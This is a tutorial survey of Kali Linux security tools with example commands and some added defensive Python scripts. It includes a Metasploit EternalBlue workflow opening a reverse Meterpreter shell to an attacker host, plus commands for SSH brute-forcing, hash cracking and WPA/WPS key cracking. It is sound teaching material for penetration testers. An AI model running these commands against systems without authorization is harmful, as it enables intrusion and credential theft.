Table of Contents#
- What is Kali Linux?
- Information Gathering Tools
- Nmap
- Maltego
- Recon-ng
- Vulnerability Scanning Tools
- Nessus
- OpenVAS (Greenbone)
- Nikto
- Exploitation Tools
- Metasploit Framework
- Exploit-DB
- Armitage
- Password Attack Tools
- John the Ripper
- Hashcat
- Hydra
- Web Application Testing Tools
- Burp Suite
- OWASP ZAP
- Wfuzz
- DirBuster
- Wireless Attack Tools
- Aircrack-ng
- Kismet
- Reaver
- Forensics Tools
- Autopsy
- Volatility
- Foremost
- Reporting Tools
- Dradis Framework
- Metasploit Reporting
- CherryTree
- Conclusion
- References
What is Kali Linux?#
Kali Linux is a Debian-based Linux distribution designed explicitly for penetration testing and cybersecurity audits. It replaces BackTrack Linux (its predecessor) and includes tools for every stage of a penetration test: from information gathering to post-exploitation forensics.
Key features of Kali Linux:
- Pre-installed with 600+ tools for testing, hacking, and forensics.
- Supports multiple desktop environments (GNOME, KDE, Xfce).
- Regularly updated with the latest security tools and patches.
- Legal for ethical use (always obtain written permission before testing systems you don’t own).
Information Gathering Tools#
Information gathering (reconnaissance) is the first phase of penetration testing. It involves collecting data about a target (e.g., IP addresses, open ports, domain details) to identify attack surfaces.
1. Nmap (Network Mapper)#
Description: Nmap is the most widely used network scanning tool. It identifies open ports, services, operating systems, and vulnerabilities on a target network.
Key Features:
- Port scanning (TCP/UDP).
- OS detection (using TCP/IP fingerprinting).
- Service version detection.
- Scriptable with Nmap Scripting Engine (NSE) for advanced tasks (e.g., vulnerability scanning, brute-forcing).
Use Case: Mapping a network to find open ports and services before launching attacks.
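An added, defender-side example that is not part of the original page: once a scan with the -sV and -O flags described above has been saved with -oG, the Python below parses the grepable output and flags open services that are missing from a per-host allowlist, turning the same scan into an attack-surface check. The sample scan lines and the allowlist are constructed.

```python
import re
from typing import Dict, List, Tuple

# Constructed Nmap grepable (-oG) output for two lab hosts; not a real scan.
SAMPLE_OG = """# Nmap 7.94 scan initiated (constructed sample)
Host: 192.168.1.1 (gw.lab)\tStatus: Up
Host: 192.168.1.1 (gw.lab)\tPorts: 22/open/tcp//ssh//OpenSSH 8.9p1/, 80/open/tcp//http//nginx 1.18.0/, 23/open/tcp//telnet///\tIgnored State: closed (997)
Host: 192.168.1.20 (db.lab)\tPorts: 3306/open/tcp//mysql//MySQL 8.0.33/, 22/filtered/tcp//ssh///\tIgnored State: closed (998)
# Nmap done (constructed sample)
"""

# Constructed allowlist: the (port, protocol) pairs each host is expected to expose.
ALLOWLIST = {
    "192.168.1.1": {(22, "tcp"), (80, "tcp")},
    "192.168.1.20": {(22, "tcp")},
}

# One -oG port entry: port/state/protocol/owner/service/rpc-info/version/
PORT_RE = re.compile(r"(\d+)/(\w+)/(\w+)/[^/]*/([^/]*)/[^/]*/([^/]*)/")

Entry = Tuple[int, str, str, str, str]   # (port, state, proto, service, version)

def parse_og(text: str) -> Dict[str, List[Entry]]:
    """Map each host IP to its port entries from Nmap grepable output."""
    hosts: Dict[str, List[Entry]] = {}
    for line in text.splitlines():
        if not line.startswith("Host:") or "Ports:" not in line:
            continue                      # status-only lines and comments carry no ports
        ip = line.split()[1]
        ports_field = line.split("Ports:", 1)[1].split("\t", 1)[0]
        for m in PORT_RE.finditer(ports_field):
            port, state, proto, service, version = m.groups()
            hosts.setdefault(ip, []).append((int(port), state, proto, service, version.strip()))
    return hosts

def unexpected_open(hosts: Dict[str, List[Entry]], allowlist) -> List[Tuple[str, int, str, str, str]]:
    """Open ports not on the host's allowlist; hosts absent from the allowlist get everything flagged."""
    findings = []
    for ip, entries in hosts.items():
        allowed = allowlist.get(ip, set())
        for port, state, proto, service, version in entries:
            if state == "open" and (port, proto) not in allowed:
                findings.append((ip, port, proto, service or "?", version or "?"))
    return sorted(findings)

if __name__ == "__main__":
    for ip, port, proto, service, version in unexpected_open(parse_og(SAMPLE_OG), ALLOWLIST):
        print(f"UNEXPECTED {ip} {port}/{proto} {service} {version}")
```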
Example Command:
nmap -sV -O -p 1-1000 192.168.1.1 # Scan ports 1-1000, detect service versions (-sV), and OS (-O)
2. Maltego#
Description: Maltego is an open-source intelligence (OSINT) tool that visualizes relationships between entities (e.g., domains, IPs, social media accounts) to uncover hidden connections.
Key Features:
- Graph-based visualization of data.
- Pre-built transforms for gathering data from sources like DNS, WHOIS, and Shodan.
- Supports custom transforms for niche use cases.
Use Case: Investigating a company’s online footprint to find linked domains, employees, or exposed servers.
How to Use:
- Launch Maltego from Kali’s Applications menu.
- Create a new graph and drag entities (e.g., “Domain”) onto the canvas.
- Run transforms to fetch data (e.g., “To IP Addresses” for a domain).
3. Recon-ng#
Description: Recon-ng is an automated reconnaissance framework that uses modules to gather intelligence from APIs, databases, and public sources.
Key Features:
- Modular architecture (over 100 modules for DNS, WHOIS, social media, etc.).
- Report generation in HTML/CSV.
- Integration with third-party services (e.g., Shodan, VirusTotal).
Use Case: Automating OSINT tasks to collect emails, subdomains, or employee names.
Example Workflow:
recon-ng # Launch the framework
marketplace install dnsenum # Install a DNS enumeration module
use recon/domains-hosts/dnsenum # Load the module
set DOMAIN example.com # Set target domain
run # Execute the module
Vulnerability Scanning Tools#
After gathering information, vulnerability scanners identify weaknesses (e.g., outdated software, misconfigurations) that could be exploited.
1. Nessus#
Description: Nessus is a commercial vulnerability scanner (free for home use) with a vast database of CVEs (Common Vulnerabilities and Exposures).
Key Features:
- Scans for over 60,000 vulnerabilities.
- Supports compliance checks (e.g., PCI DSS, HIPAA).
- Customizable scan policies.
Use Case: Detecting critical vulnerabilities like SQL injection or buffer overflows on a web server.
How to Use:
- Download Nessus from tenable.com.
- Install and activate the free home license.
- Create a scan policy (e.g., “Basic Network Scan”) and target an IP range.
2. OpenVAS (Greenbone Vulnerability Manager)#
Description: OpenVAS (Open Vulnerability Assessment System) is an open-source alternative to Nessus. It’s pre-installed in Kali Linux.
Key Features:
- Regularly updated vulnerability feed (NVTs: Network Vulnerability Tests).
- Web-based GUI for easy management.
- Supports credentialed scans (authenticated testing).
Use Case: Scanning internal networks for missing patches or misconfigured services.
Example Command (to start the service):
sudo gvm-start # Launches the OpenVAS service and web interface
3. Nikto#
Description: Nikto is a lightweight, command-line tool for scanning web servers for vulnerabilities (e.g., outdated software, misconfigurations, malware).
Key Features:
- Checks for over 6,700 known vulnerabilities.
- Supports SSL scans and proxy integration.
- Generates plaintext/HTML reports.
Use Case: Auditing a web server (Apache, Nginx) for common issues like open directories or outdated plugins.
Example Command:
nikto -h https://example.com -p 443 # Scan port 443 (HTTPS) on example.com
Exploitation Tools#
Exploitation tools use identified vulnerabilities to gain unauthorized access to systems.
1. Metasploit Framework#
Description: The Metasploit Framework is the most popular exploitation tool, with a library of pre-built exploits, payloads, and post-exploitation modules.
Key Features:
- Exploit database (over 2,000 exploits).
- Payloads (e.g., reverse shells, Meterpreter).
- Post-exploitation modules (e.g., keylogging, privilege escalation).
- msfconsole: Interactive command-line interface.
Use Case: Exploiting a vulnerability (e.g., EternalBlue) to gain remote access to a Windows machine.
Example Workflow:
msfconsole # Launch Metasploit
search eternalblue # Find the EternalBlue exploit
use exploit/windows/smb/ms17_010_eternalblue # Load the exploit
set RHOSTS 192.168.1.10 # Target IP
set PAYLOAD windows/x64/meterpreter/reverse_tcp # Payload to execute
set LHOST 192.168.1.5 # Your IP (attacker)
exploit # Launch the exploit
2. Exploit-DB#
Description: Exploit-DB is a database of public exploits and vulnerabilities, maintained by Offensive Security. It’s integrated into Kali Linux via the searchsploit command.
Key Features:
- Searchable via CLI (searchsploit).
- Includes exploit code (Python, C, etc.).
- Links to CVEs and vulnerability details.
Use Case: Finding an exploit for a specific software version (e.g., “Apache Struts 2.5.10”).
Example Command:
searchsploit "Apache Struts 2.5.10" # Search for exploits targeting Apache Struts 2.5.10
3. Armitage#
Description: Armitage is a GUI front-end for Metasploit that simplifies exploit management and team collaboration.
Key Features:
- Visual network mapping of targets.
- Drag-and-drop exploit execution.
- Real-time session management (e.g., pivoting between compromised hosts).
Use Case: Managing multiple Metasploit sessions during a penetration test.
How to Use:
- Launch Metasploit (msfconsole).
- In a new terminal, run armitage to connect to the Metasploit RPC server.
Password Attack Tools#
Password attacks target weak or compromised credentials to gain access to accounts or systems.
1. John the Ripper (John)#
Description: John the Ripper is a fast password-cracking tool that brute-forces or dictionary-attacks hashed passwords (e.g., MD5, SHA-1).
Key Features:
- Supports multiple hash types.
- Custom wordlists and rules (e.g., leet speak transformations).
- GPU acceleration (via OpenCL).
Use Case: Cracking a Linux /etc/shadow file or Windows NTLM hashes.
Example Command:
john --wordlist=/usr/share/wordlists/rockyou.txt hashes.txt # Crack hashes using the rockyou wordlist
2. Hashcat#
Description: Hashcat is the world’s fastest password cracker, optimized for GPU acceleration. It supports more algorithms than John the Ripper.
Key Features:
- Over 300 hash types (e.g., bcrypt, Argon2, Bitcoin).
- Mask attacks (custom pattern brute-forcing).
- Benchmarking tools to optimize performance.
Use Case: Cracking modern hashes like bcrypt or PBKDF2.
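An added, defender-side example that is not part of the original page, serving both the John the Ripper section (its /etc/shadow use case) and the Hashcat section above: how fast either tool gets through a shadow file depends on the hashing scheme each account uses, since md5crypt and legacy DES crypt fall orders of magnitude faster than bcrypt, yescrypt, or SHA-512-crypt with a high round count. The Python below parses constructed /etc/shadow lines by their crypt(5) prefix and reports accounts whose password field is empty or uses a weak scheme; the sample lines, salts, hashes and the MIN_SHA_ROUNDS threshold are constructed or assumed.

```python
import re
from typing import Dict, List, Optional

# Constructed /etc/shadow lines with fake salts and hashes; not from a real system.
SAMPLE_SHADOW = """root:$6$rounds=100000$c0nstructedSalt$AbCdEfGhIjKlMnOp:19700:0:99999:7:::
alice:$y$j9T$c0nstructedSalt$QrStUvWxYz0123456:19700:0:99999:7:::
bob:$1$c0nstr$AbCdEfGhIjKlMnOpQrStUv:19700:0:99999:7:::
carol:$6$c0nstructedSalt$WxYz0123456789AbCdEf:19700:0:99999:7:::
legacy:AbCdEfGhIjKlM:19700:0:99999:7:::
svc:!:19700:0:99999:7:::
guest::19700:0:99999:7:::
"""

# crypt(5) scheme identifiers as they appear between the first two '$'.
SCHEMES = {"1": "md5crypt", "2a": "bcrypt", "2b": "bcrypt", "2y": "bcrypt", "5": "sha256crypt",
           "6": "sha512crypt", "7": "scrypt", "y": "yescrypt", "gy": "gost-yescrypt"}
MIN_SHA_ROUNDS = 50_000   # assumed local policy threshold; glibc's default is 5000

def classify(field: str) -> Dict[str, Optional[object]]:
    """Describe one shadow password field: scheme, rounds (if encoded) and a weakness note or None."""
    if field == "":
        return {"scheme": "none", "rounds": None, "weak": "empty password field (no password required)"}
    if field.startswith(("!", "*")):
        return {"scheme": "locked", "rounds": None, "weak": None}
    if not field.startswith("$"):
        return {"scheme": "des-crypt", "rounds": None, "weak": "legacy DES crypt: 8-char limit, fast to crack"}
    parts = field.split("$")           # ['', scheme, (rounds=N,) salt, hash]
    scheme = SCHEMES.get(parts[1], "unknown:" + parts[1])
    m = re.match(r"rounds=(\d+)$", parts[2]) if len(parts) > 2 else None
    rounds = int(m.group(1)) if m else (5000 if scheme in ("sha256crypt", "sha512crypt") else None)
    weak = None
    if scheme == "md5crypt":
        weak = "md5crypt: fast and GPU-friendly; migrate to yescrypt or bcrypt"
    elif scheme in ("sha256crypt", "sha512crypt") and rounds < MIN_SHA_ROUNDS:
        weak = f"{scheme} with only {rounds} rounds"
    return {"scheme": scheme, "rounds": rounds, "weak": weak}

def audit_shadow(text: str) -> List[str]:
    """Return 'user: reason' for every account whose password field is weak or empty."""
    findings = []
    for line in text.splitlines():
        if not line or line.startswith("#"):
            continue
        user, field = line.split(":", 2)[:2]
        info = classify(field)
        if info["weak"]:
            findings.append(f"{user}: {info['weak']}")
    return findings
```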
Example Command:
hashcat -m 1000 -a 0 hashes.txt /usr/share/wordlists/rockyou.txt # Crack NTLM hashes (-m 1000) with rockyou.txt
3. Hydra#
Description: Hydra is a brute-force tool that attacks network services (e.g., SSH, FTP, HTTP) by trying username/password combinations.
Key Features:
- Supports 50+ protocols (SSH, RDP, SMTP, etc.).
- Parallel tasking for speed.
- Customizable timeout and retry settings.
Use Case: Brute-forcing an SSH server with weak credentials.
Example Command:
hydra -l admin -P /usr/share/wordlists/rockyou.txt ssh://192.168.1.10 # Brute-force SSH with username "admin"
Web Application Testing Tools#
Web apps are prime targets for attacks. These tools identify vulnerabilities like SQL injection, XSS, or CSRF.
1. Burp Suite#
Description: Burp Suite is a web vulnerability scanner and proxy tool, essential for manual web app testing. The free “Community Edition” includes core features; the paid “Professional Edition” adds automated scanning.
Key Features:
- Proxy: Intercept and modify HTTP/HTTPS requests.
- Scanner: Automated vulnerability detection (Pro only).
- Intruder: Brute-force parameters (e.g., usernames, URLs).
- Repeater: Manually resend and tweak requests.
Use Case: Testing a login form for SQL injection or brute-forcing a password.
How to Use:
- Configure your browser to proxy traffic through Burp (default: 127.0.0.1:8080).
- Use the “Proxy” tab to intercept requests and the “Intruder” tab to brute-force parameters.
2. OWASP ZAP (Zed Attack Proxy)#
Description: OWASP ZAP is an open-source alternative to Burp Suite, designed for automated and manual web app testing.
Key Features:
- Automated scanner (finds XSS, SQLi, etc.).
- Proxy and spider (crawls web apps to map endpoints).
- Scripting support (JavaScript, Python).
Use Case: Scanning a small web app for common vulnerabilities without a paid license.
Example Workflow:
- Launch ZAP and enter a target URL (e.g., http://example.com).
- Click “Attack” > “Active Scan” to start automated testing.
3. Wfuzz#
Description: Wfuzz is a web fuzzer that brute-forces parameters (e.g., URLs, form fields) to find hidden resources or vulnerabilities.
Key Features:
- Custom payload lists (e.g., directories, usernames).
- Filter responses by status code, size, or content.
- Recursive scanning.
Use Case: Finding hidden directories (e.g., /admin, /backup) on a web server.
Example Command:
wfuzz -w /usr/share/wordlists/dirb/common.txt http://example.com/FUZZ # Fuzz for directories using "common.txt"
4. DirBuster#
Description: DirBuster is a GUI tool for brute-forcing web directories and files, ideal for finding hidden paths.
Key Features:
- Pre-built wordlists (e.g., directory-list-2.3-medium.txt).
- Custom extensions (e.g., .php, .html).
- Progress tracking and reports.
Use Case: Enumerating files like config.php or backup.zip on a web server.
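An added, defender-side example that is not part of the original page, serving both the Hydra section (SSH brute-forcing) and the Wfuzz/DirBuster sections above: on the target, a Hydra run shows up as a burst of sshd "Failed password" lines from one source, and a directory fuzzer as a burst of 404 responses from one client. The Python below applies one sliding-window counter to both constructed log sources and reports sources that exceed a threshold inside the window; the log lines, thresholds and window size are constructed or assumed.

```python
import re
from collections import defaultdict, deque
from datetime import datetime

# Constructed sshd and web-server log lines (RFC 5737 addresses); not real traffic.
AUTH_LOG = """Jan 10 12:00:01 srv sshd[811]: Failed password for admin from 203.0.113.5 port 51234 ssh2
Jan 10 12:00:02 srv sshd[811]: Failed password for admin from 203.0.113.5 port 51235 ssh2
Jan 10 12:00:02 srv sshd[811]: Failed password for invalid user test from 203.0.113.5 port 51236 ssh2
Jan 10 12:00:03 srv sshd[811]: Failed password for admin from 203.0.113.5 port 51237 ssh2
Jan 10 12:05:00 srv sshd[812]: Failed password for alice from 198.51.100.9 port 40000 ssh2
"""
ACCESS_LOG = """203.0.113.7 - - [10/Jan/2024:12:00:00 +0000] "GET /admin HTTP/1.1" 404 153 "-" "Mozilla/5.0"
203.0.113.7 - - [10/Jan/2024:12:00:00 +0000] "GET /backup HTTP/1.1" 404 153 "-" "Mozilla/5.0"
203.0.113.7 - - [10/Jan/2024:12:00:01 +0000] "GET /index.html HTTP/1.1" 200 1024 "-" "Mozilla/5.0"
203.0.113.7 - - [10/Jan/2024:12:00:02 +0000] "GET /test HTTP/1.1" 404 153 "-" "Mozilla/5.0"
198.51.100.9 - - [10/Jan/2024:12:00:05 +0000] "GET /missing HTTP/1.1" 404 153 "-" "Mozilla/5.0"
"""

SSH_RE = re.compile(r"^(\w{3} +\d+ \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: Failed password for .* from (\S+) port")
WEB_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "[^"]*" (\d{3}) ')

def ssh_failure(line):
    """(timestamp, source IP) for an sshd 'Failed password' line, else None."""
    m = SSH_RE.match(line)
    if not m:
        return None
    return datetime.strptime(m.group(1), "%b %d %H:%M:%S"), m.group(2)  # syslog has no year; deltas still work

def web_404(line):
    """(timestamp, source IP) for a combined-format access log line with status 404, else None."""
    m = WEB_RE.match(line)
    if not m or m.group(3) != "404":
        return None
    return datetime.strptime(m.group(2), "%d/%b/%Y:%H:%M:%S %z"), m.group(1)

def burst_sources(lines, extract, threshold, window_s):
    """Sources with at least `threshold` events inside any `window_s`-second window (lines in time order)."""
    recent, flagged = defaultdict(deque), set()
    for line in lines:
        event = extract(line)
        if event is None:
            continue
        ts, src = event
        q = recent[src]
        q.append(ts)
        while (ts - q[0]).total_seconds() > window_s:   # expire events older than the window
            q.popleft()
        if len(q) >= threshold:
            flagged.add(src)
    return sorted(flagged)
```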
Wireless Attack Tools#
Wireless networks (Wi-Fi) are often targets for attacks due to weak encryption or misconfigurations.
1. Aircrack-ng#
Description: Aircrack-ng is a suite of tools for auditing wireless networks, including capturing packets and cracking WEP/WPA/WPA2 keys.
Key Features:
- airodump-ng: Captures Wi-Fi packets (beacons, handshakes).
- aircrack-ng: Cracks WEP/WPA keys using wordlists.
- aireplay-ng: Generates traffic to speed up WEP cracking.
Use Case: Cracking a WPA2-PSK network by capturing the handshake and brute-forcing the password.
Example Workflow:
airodump-ng wlan0mon # Monitor Wi-Fi networks (start monitor mode first with airmon-ng)
airodump-ng -c 6 --bssid AA:BB:CC:DD:EE:FF -w capture wlan0mon # Capture handshake for target BSSID on channel 6
aircrack-ng -w /usr/share/wordlists/rockyou.txt capture-01.cap # Crack the handshake
2. Kismet#
Description: Kismet is a wireless network detector, sniffer, and intrusion detection system (IDS). It identifies hidden networks and rogue access points.
Key Features:
- Passive monitoring (doesn’t send packets, so harder to detect).
- Supports 802.11 (Wi-Fi), Bluetooth, and Zigbee.
- Real-time alerts for suspicious activity.
Use Case: Detecting unauthorized access points (rogue APs) in a corporate network.
3. Reaver#
Description: Reaver exploits a vulnerability in WPS (Wi-Fi Protected Setup) to brute-force the WPS PIN, then recover the WPA/WPA2 password.
Key Features:
- Brute-forces 8-digit WPS PINs (10^8 combinations, but optimized to ~11k attempts).
- Supports Pixie Dust attack (bypasses PIN lockouts on vulnerable routers).
Use Case: Cracking a WPA2 network with WPS enabled.
Example Command:
reaver -i wlan0mon -b AA:BB:CC:DD:EE:FF -vv # Attack target BSSID with verbose mode (-vv)
Forensics Tools#
Forensics tools help investigate compromised systems, recover data, and analyze evidence post-exploitation.
1. Autopsy#
Description: Autopsy is a GUI-based digital forensics platform that simplifies disk imaging, file recovery, and timeline analysis.
Key Features:
- Disk imaging (create forensic copies of drives).
- Keyword search and hash matching (e.g., known bad files).
- Timeline analysis (track file changes over time).
Use Case: Investigating a compromised Windows laptop to find malware artifacts.
2. Volatility#
Description: Volatility is a memory forensics tool that analyzes RAM dumps to extract running processes, network connections, and malware.
Key Features:
- Plugins for process listing (pslist), network analysis (netstat), and malware detection (malfind).
- Supports Windows, Linux, and macOS memory dumps.
Use Case: Identifying a hidden malware process in a suspect’s RAM.
Example Command:
volatility -f memdump.raw --profile=Win7SP1x64 pslist # List running processes in a Windows 7 x64 memory dump
3. Foremost#
Description: Foremost is a file-carving tool that recovers deleted files (e.g., images, documents) from disk images or raw storage.
Key Features:
- Supports 40+ file types (JPEG, PDF, ZIP, etc.).
- Reads raw disks, disk images, or folders.
- Outputs recovered files to a structured directory.
Use Case: Recovering deleted photos from a USB drive.
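An added example that is not part of the original page or of Foremost itself: file carving works by scanning raw bytes for a type's header signature and then for its footer, ignoring any filesystem metadata, which is why it recovers files whose directory entries are gone. The Python below builds a constructed raw image in memory containing a small JPEG and PDF among filler bytes and carves both out the way a jpg,pdf run would; the image, signatures table and the offset-based output names are constructed, and the carver is a simplified version of the technique, not Foremost's code.

```python
import hashlib
from typing import Dict, List, Tuple

# Header, footer and maximum carve length for the two types discussed here (jpg, pdf).
SIGNATURES: Dict[str, Tuple[bytes, bytes, int]] = {
    "jpg": (b"\xff\xd8\xff", b"\xff\xd9", 20_000_000),   # SOI marker ... EOI marker
    "pdf": (b"%PDF-", b"%%EOF", 50_000_000),             # version header ... trailer keyword
}

def build_sample_image() -> bytes:
    """Constructed raw 'disk' bytes: a tiny JPEG and PDF sitting in filler, with no filesystem metadata."""
    jpeg = b"\xff\xd8\xff\xe0\x00\x10JFIF\x00" + b"\x11" * 40 + b"\xff\xd9"
    pdf = b"%PDF-1.4\n1 0 obj<<>>endobj\ntrailer<<>>\n%%EOF"
    filler = bytes(range(256)) * 2          # never contains a full header or footer sequence
    return filler + jpeg + filler[:37] + pdf + b"\x00" * 64

def carve(image: bytes, types: List[str]) -> List[Tuple[str, int, bytes]]:
    """Return (type, offset, data) for each header..footer span, the core of what a carver does."""
    found = []
    for kind in types:
        header, footer, max_len = SIGNATURES[kind]
        pos = 0
        while True:
            start = image.find(header, pos)
            if start == -1:
                break
            end = image.find(footer, start + len(header), start + max_len)
            if end == -1:                   # header with no footer in range: truncated, skip it
                pos = start + 1
                continue
            end += len(footer)
            found.append((kind, start, image[start:end]))
            pos = end
    return sorted(found, key=lambda f: f[1])

def recover(image: bytes, types: List[str]) -> List[Tuple[str, int, str]]:
    """Name each carved file by offset (constructed naming) and SHA-256 it for the evidence log."""
    return [(f"{off:08d}.{kind}", len(data), hashlib.sha256(data).hexdigest())
            for kind, off, data in carve(image, types)]
```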
Example Command:
foremost -t jpg,pdf -i /dev/sdb1 -o recovered_files # Recover JPG/PDF files from /dev/sdb1 (USB drive)
Reporting Tools#
Penetration testing isn’t complete without documenting findings. Reporting tools streamline this process.
1. Dradis Framework#
Description: Dradis is a collaborative reporting platform for penetration testers to share notes, evidence, and findings.
Key Features:
- Template-based reports (e.g., PCI DSS, NIST).
- Integration with tools like Nmap, Burp Suite, and Nessus.
- Team collaboration (multi-user support).
Use Case: Creating a client-ready report with vulnerability details, risk scores, and remediation steps.
2. Metasploit Reporting#
Description: Metasploit includes built-in reporting modules to export findings (e.g., HTML, XML) directly from msfconsole.
Example Command:
msfconsole
db_export -f html report.html # Export scan/exploit data to HTML
3. CherryTree#
Description: CherryTree is a note-taking tool with hierarchical organization, ideal for jotting down findings, commands, and evidence during testing.
Key Features:
- Rich text formatting and code blocks.
- Image and file attachments.
- Encrypted databases (protect sensitive data).
Conclusion#
Kali Linux’s toolkit empowers ethical hackers and security professionals to identify and mitigate vulnerabilities. However, always use these tools legally and ethically—obtain written permission before testing any system you don’t own.
Mastery comes with practice: start with information gathering (Nmap, Maltego), move to scanning (Nessus, OpenVAS), exploit with Metasploit, and document with Dradis. As the cybersecurity landscape evolves, stay updated with new tools and techniques via resources like Kali Linux Docs and Offensive Security.
References#
- Kali Linux Official Documentation
- Metasploit Framework Documentation
- OWASP ZAP Documentation
- Aircrack-ng Wiki
- Offensive Security (Maintainers of Kali Linux)
- RockYou Wordlist (Commonly used password list in Kali Linux)